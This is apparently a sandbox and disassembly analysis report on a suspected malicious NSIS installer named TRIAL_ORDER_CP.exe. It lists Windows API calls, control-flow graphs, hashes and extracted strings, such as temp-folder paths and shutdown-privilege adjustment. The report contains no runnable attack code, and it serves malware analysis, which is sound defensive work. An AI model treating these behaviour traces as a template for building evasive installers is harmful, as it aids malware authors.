                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AFE
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                          • ExitProcess.KERNEL32 ref: 00403B46
                                            • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$1033$964$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Crumbliness$C:\Users\user\Desktop$C:\Users\user\Desktop\TRIAL_ORDER_CP.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                          • API String ID: 1813718867-874832502
                                          • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                          • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E
                                          APIs
                                            • Part of subcall function 706812BB: GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70681D2D
                                          • lstrcpyW.KERNEL32(00000008,?), ref: 70681D75
                                          • lstrcpyW.KERNEL32(00000808,?), ref: 70681D7F
                                          • GlobalFree.KERNEL32(00000000), ref: 70681D92
                                          • GlobalFree.KERNEL32(?), ref: 70681E74
                                          • GlobalFree.KERNEL32(?), ref: 70681E79
                                          • GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 70682068
                                          • lstrcpyW.KERNEL32(?,?), ref: 70682222
                                          • GetModuleHandleW.KERNEL32(00000008), ref: 706822A1
                                          • LoadLibraryW.KERNEL32(00000008), ref: 706822B2
                                          • GetProcAddress.KERNEL32(?,?), ref: 7068230C
                                          • lstrlenW.KERNEL32(00000808), ref: 70682326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                          • String ID:
                                          • API String ID: 245916457-0
                                          • Opcode ID: 572b017e4070f938d6ca582d07f2ea793650e4cfac0da41ee6d8a9124a715d36
                                          • Instruction ID: 7e2dcd10869732d7a638db38e09a17f9843e4f9e9e25429a5a96dd7128a81757
                                          • Opcode Fuzzy Hash: 572b017e4070f938d6ca582d07f2ea793650e4cfac0da41ee6d8a9124a715d36
                                          • Instruction Fuzzy Hash: C6228EB1D00606DFCB118FA4C9A46EEB7F9FF08315F20452ED6A6EA2D0D7B45A81DB50

                                          Control-flow Graph
                                          control_flow_graph 620 405c60-405c86 call 405f2b 623 405c88-405c9a DeleteFileW 620->623 624 405c9f-405ca6 620->624 625 405e1c-405e20 623->625 626 405ca8-405caa 624->626 627 405cb9-405cc9 call 406554 624->627 628 405cb0-405cb3 626->628 629 405dca-405dcf 626->629 635 405cd8-405cd9 call 405e6f 627->635 636 405ccb-405cd6 lstrcatW 627->636 628->627 628->629 629->625 631 405dd1-405dd4 629->631 633 405dd6-405ddc 631->633 634 405dde-405de6 call 4068b1 631->634 633->625 634->625 644 405de8-405dfc call 405e23 call 405c18 634->644 639 405cde-405ce2 635->639 636->639 640 405ce4-405cec 639->640 641 405cee-405cf4 lstrcatW 639->641 640->641 643 405cf9-405d15 lstrlenW FindFirstFileW 640->643 641->643 645 405d1b-405d23 643->645 646 405dbf-405dc3 643->646 660 405e14-405e17 call 4055d9 644->660 661 405dfe-405e01 644->661 648 405d43-405d57 call 406554 645->648 649 405d25-405d2d 645->649 646->629 651 405dc5 646->651 662 405d59-405d61 648->662 663 405d6e-405d79 call 405c18 648->663 652 405da2-405db2 FindNextFileW 649->652 653 405d2f-405d37 649->653 651->629 652->645 659 405db8-405db9 FindClose 652->659 653->648 656 405d39-405d41 653->656 656->648 656->652 659->646 660->625 661->633 666 405e03-405e12 call 4055d9 call 406314 661->666 662->652 667 405d63-405d6c call 405c60 662->667 671 405d9a-405d9d call 4055d9 663->671 672 405d7b-405d7e 663->672 666->625 667->652 671->652 675 405d80-405d90 call 4055d9 call 406314 672->675 676 405d92-405d98 672->676 675->652 676->652
                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405C89
                                          • lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CD1
                                          • lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CF4
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CFA
                                          • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405D0A
                                          • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405DAA
                                          • FindClose.KERNEL32(00000000), ref: 00405DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                          • API String ID: 2035342205-1424711887
                                          • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                          • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                          • FindClose.KERNEL32(00000000), ref: 004068C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                          • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

                                          Control-flow Graph
                                          control_flow_graph 151 403fd4-403fe6 152 403fec-403ff2 151->152 153 40414d-40415c 151->153 152->153 154 403ff8-404001 152->154 155 4041ab-4041c0 153->155 156 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 153->156 157 404003-404010 SetWindowPos 154->157 158 404016-40401d 154->158 160 404200-404205 call 40451f 155->160 161 4041c2-4041c5 155->161 156->155 157->158 163 404061-404067 158->163 164 40401f-404039 ShowWindow 158->164 169 40420a-404225 160->169 166 4041c7-4041d2 call 401389 161->166 167 4041f8-4041fa 161->167 172 404080-404083 163->172 173 404069-40407b DestroyWindow 163->173 170 40413a-404148 call 40453a 164->170 171 40403f-404052 GetWindowLongW 164->171 166->167 192 4041d4-4041f3 SendMessageW 166->192 167->160 168 4044a0 167->168 180 4044a2-4044a9 168->180 177 404227-404229 call 40140b 169->177 178 40422e-404234 169->178 170->180 171->170 179 404058-40405b ShowWindow 171->179 183 404085-404091 SetWindowLongW 172->183 184 404096-40409c 172->184 181 40447d-404483 173->181 177->178 189 40423a-404245 178->189 190 40445e-404477 DestroyWindow EndDialog 178->190 179->163 181->168 188 404485-40448b 181->188 183->180 184->170 191 4040a2-4040b1 GetDlgItem 184->191 188->168 193 40448d-404496 ShowWindow 188->193 189->190 194 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 189->194 190->181 195 4040d0-4040d3 191->195 196 4040b3-4040ca SendMessageW IsWindowEnabled 191->196 192->180 193->168 223 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 194->223 224 40429a-40429f 194->224 198 4040d5-4040d6 195->198 199 4040d8-4040db 195->199 196->168 196->195 200 404106-40410b call 4044ac 198->200 201 4040e9-4040ee 199->201 202 4040dd-4040e3 199->202 200->170 204 404124-404134 SendMessageW 201->204 206 4040f0-4040f6 201->206 202->204 205 4040e5-4040e7 202->205 204->170 205->200 209 4040f8-4040fe call 40140b 206->209 210 40410d-404116 call 40140b 206->210 219 404104 209->219 210->170 220 404118-404122 210->220 219->200 220->219 227 4042e0-4042e1 223->227 228 4042e3 223->228 224->223 229 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 227->229 228->229 230 404315-404326 SendMessageW 229->230 231 404328 229->231 232 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 230->232 231->232 232->169 243 404373-404375 232->243 243->169 244 40437b-40437f 243->244 245 404381-404387 244->245 246 40439e-4043b2 DestroyWindow 244->246 245->168 247 40438d-404393 245->247 246->181 248 4043b8-4043e5 CreateDialogParamW 246->248 247->169 249 404399 247->249 248->181 250 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 248->250 249->168 250->168 255 404444-404457 ShowWindow call 40451f 250->255 257 40445c 255->257 257->181
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                          • ShowWindow.USER32(?), ref: 00404030
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                          • ShowWindow.USER32(?,00000004), ref: 0040405B
                                          • DestroyWindow.USER32 ref: 0040406F
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                          • GetDlgItem.USER32(?,?), ref: 004040A7
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                          • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                          • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,00000002), ref: 00404177
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                          • GetDlgItem.USER32(?,00000003), ref: 00404288
                                          • ShowWindow.USER32(00000000,?), ref: 004042A9
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                          • EnableWindow.USER32(?,?), ref: 004042D6
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
                                          • EnableMenuItem.USER32(00000000), ref: 004042F3
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                          • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                          • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                          • ShowWindow.USER32(?,0000000A), ref: 00404490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 121052019-0
                                          • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                          • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                          Control-flow Graph

                                          control_flow_graph 258 403c26-403c3e call 406948 261 403c40-403c50 call 40649b 258->261 262 403c52-403c89 call 406422 258->262 271 403cac-403cd5 call 403efc call 405f2b 261->271 266 403ca1-403ca7 lstrcatW 262->266 267 403c8b-403c9c call 406422 262->267 266->271 267->266 276 403d67-403d6f call 405f2b 271->276 277 403cdb-403ce0 271->277 282 403d71-403d78 call 406591 276->282 283 403d7d-403da2 LoadImageW 276->283 277->276 278 403ce6-403d0e call 406422 277->278 278->276 285 403d10-403d14 278->285 282->283 287 403e23-403e2b call 40140b 283->287 288 403da4-403dd4 RegisterClassW 283->288 289 403d26-403d32 lstrlenW 285->289 290 403d16-403d23 call 405e50 285->290 301 403e35-403e40 call 403efc 287->301 302 403e2d-403e30 287->302 291 403ef2 288->291 292 403dda-403e1e SystemParametersInfoW CreateWindowExW 288->292 296 403d34-403d42 lstrcmpiW 289->296 297 403d5a-403d62 call 405e23 call 406554 289->297 290->289 295 403ef4-403efb 291->295 292->287 296->297 300 403d44-403d4e GetFileAttributesW 296->300 297->276 304 403d50-403d52 300->304 305 403d54-403d55 call 405e6f 300->305 311 403e46-403e60 ShowWindow call 4068d8 301->311 312 403ec9-403ed1 call 4056ac 301->312 302->295 304->297 304->305 305->297 317 403e62-403e67 call 4068d8 311->317 318 403e6c-403e7e GetClassInfoW 311->318 319 403ed3-403ed9 312->319 320 403eeb-403eed call 40140b 312->320 317->318 323 403e80-403e90 GetClassInfoW RegisterClassW 318->323 324 403e96-403eb9 DialogBoxParamW call 40140b 318->324 319->302 325 403edf-403ee6 call 40140b 319->325 320->291 323->324 328 403ebe-403ec7 call 403b76 324->328 325->302 328->295
                                          APIs
                                            • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                            • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                          • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75D23420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00403CA7
                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75D23420), ref: 00403D27
                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E
                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                          • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                          • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                          • RegisterClassW.USER32(007A7200), ref: 00403E90
                                          • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-3453379739
                                          • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                          • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                          Control-flow Graph

                                          control_flow_graph 332 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 335 4030f2-4030f7 332->335 336 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 332->336 337 4032d2-4032d6 335->337 344 403130 336->344 345 403215-403223 call 40303e 336->345 346 403135-40314c 344->346 351 403225-403228 345->351 352 403278-40327d 345->352 348 403150-403159 call 4034d1 346->348 349 40314e 346->349 358 40327f-403287 call 40303e 348->358 359 40315f-403166 348->359 349->348 354 40322a-403242 call 4034e7 call 4034d1 351->354 355 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 351->355 352->337 354->352 378 403244-40324a 354->378 355->352 383 403289-40329a 355->383 358->352 362 4031e2-4031e6 359->362 363 403168-40317c call 405fff 359->363 367 4031f0-4031f6 362->367 368 4031e8-4031ef call 40303e 362->368 363->367 381 40317e-403185 363->381 374 403205-40320d 367->374 375 4031f8-403202 call 406a35 367->375 368->367 374->346 382 403213 374->382 375->374 378->352 378->355 381->367 387 403187-40318e 381->387 382->345 384 4032a2-4032a7 383->384 385 40329c 383->385 388 4032a8-4032ae 384->388 385->384 387->367 389 403190-403197 387->389 388->388 390 4032b0-4032cb SetFilePointer call 405fff 388->390 389->367 391 403199-4031a0 389->391 394 4032d0 390->394 391->367 393 4031a2-4031c2 391->393 393->352 395 4031c8-4031cc 393->395 394->337 396 4031d4-4031dc 395->396 397 4031ce-4031d2 395->397 